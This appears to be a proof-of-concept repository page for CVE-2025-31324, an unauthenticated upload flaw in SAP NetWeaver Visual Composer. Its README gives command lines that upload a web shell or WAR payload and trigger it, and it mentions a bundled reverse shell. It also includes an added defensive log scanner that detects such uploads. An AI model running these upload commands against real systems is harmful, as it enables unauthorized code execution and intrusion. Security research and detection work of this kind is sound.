CVE-2025-31324 PoC — Missing Authorization check in SAP NetWeaver (Visual Composer development server)

Associated Vulnerability
Title: Missing Authorization check in SAP NetWeaver (Visual Composer development server) (CVE-2025-31324)
Description: SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing an unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
Description
Proof-of-Concept for CVE-2025-31324: Unauthenticated upload in SAP NetWeaver Visual Composer Metadata Uploader
Readme
# CVE-2025-31324_PoC

This script performs:
  1. File upload to the vulnerable endpoint (via Upload host/port)
  2. Optional trigger via HTTP GET (via Trigger host/port)
  3. Basic response validation/logging

Usage example:
  python3 PoC.py \
    --host sap.example.com --port 50000 \
    --endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR \
    --file EvilPayload.war \
    --trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp \
    --trigger-host sap.example.com --trigger-port 50001 --trigger-https true \
    --bypass-portal

  python3 PoC.py --host sap.example.com --port 50000 \
    --endpoint /developmentserver/metadatauploader \
    --file shell.jsp \
    --trigger-path /visual_composer/shell.jsp \
    --trigger-host sap.example.com --trigger-port 50001 --trigger-https

You also have the ability to upload a .war file if that is how you would like to execute. cache.jsp is a reverse shell that will give you access once inside the system. (Still working out issues there)
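
A defender's counterpart to the upload and trigger steps the script performs, as an added example that is not part of the PoC repository: it scans web access logs for POSTs to the upload endpoints that carry no authenticated user, and for JSP requests under the trigger paths that follow an accepted upload. The Common Log Format layout, the function and variable names, and the sample lines are assumptions; the paths are the ones in the usage examples above.

```python
import re

# Upload endpoints and post-upload URL prefixes as they appear in the README's usage examples.
UPLOAD_PATHS = ("/developmentserver/metadatauploader",
                "/irj/portal/sap/bc/webdynpro/sap/zwdc_metadata_upldr")
TRIGGER_PREFIXES = ("/irj/portal/irj/servlet_jsp/irj/root/", "/visual_composer/")

# Assumption: Common Log Format with the authenticated user in field 3 ("-" if none).
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
                     r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+')

def find_suspicious(lines):
    """Return (line_no, kind, client_ip, path) for uploader POSTs without a
    user and for JSP requests under the trigger prefixes that follow one."""
    findings, uploaders = [], set()
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        path = m["url"].split("?", 1)[0]  # ignore the query string
        low = path.lower()
        if m["method"] == "POST" and low.rstrip("/") in UPLOAD_PATHS and m["user"] == "-":
            accepted = m["status"].startswith("2")
            if accepted:
                uploaders.add(m["ip"])
            kind = "unauth-upload-accepted" if accepted else "unauth-upload-attempt"
            findings.append((n, kind, m["ip"], path))
        elif (uploaders and m["status"] == "200" and low.endswith((".jsp", ".jspx"))
              and low.startswith(TRIGGER_PREFIXES)):
            # A JSP served from a trigger path after an accepted upload.
            who = "same-client" if m["ip"] in uploaders else "other-client"
            findings.append((n, "jsp-after-upload:" + who, m["ip"], path))
    return findings

# Constructed sample lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/May/2025:10:00:01 +0000] "GET /irj/portal HTTP/1.1" 200 5120',
    '198.51.100.23 - - [01/May/2025:10:02:11 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 44',
    '198.51.100.23 - - [01/May/2025:10:02:15 +0000] "GET /irj/portal/irj/servlet_jsp/irj/root/sample/sample.jsp HTTP/1.1" 200 12',
    '203.0.113.7 - jdoe [01/May/2025:10:03:00 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 44',
    '198.51.100.99 - - [01/May/2025:10:04:00 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 403 0',
    '198.51.100.99 - - [01/May/2025:10:05:00 +0000] "GET /visual_composer/sample.jsp HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding)
```

Findings are triage leads: an accepted upload followed by a served JSP is the pattern to review first, while a rejected attempt shows probing.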

# Disclaimer
This is intended for educational purposes only and should not be used for any malicious activities. Always ensure you have the necessary permissions and follow ethical guidelines when testing or researching security vulnerabilities.

For any questions or clarifications, please feel free to reach out. Stay safe and secure!
File Snapshot

[4.0K]  /data/pocs/f5eac7d3e99d38acb498e28334cf702f94d661bc
├── [ 398]  cache.jsp
├── [ 898]  CheckForEndpoints.sh
├── [4.0K]  EvilPayload
│   ├── [  86]  metadata.xml
│   ├── [4.0K]  META-INF
│   │   └── [  59]  MANIFEST.MF
│   ├── [4.0K]  pages
│   │   └── [ 399]  shell.jsp
│   └── [4.0K]  WEB-INF
│       └── [ 430]  web.xml
├── [1.0K]  LICENSE
├── [4.8K]  PoC.py
├── [1.4K]  README.md
└── [ 963]  ScanForVisualComposer.sh

4 directories, 10 files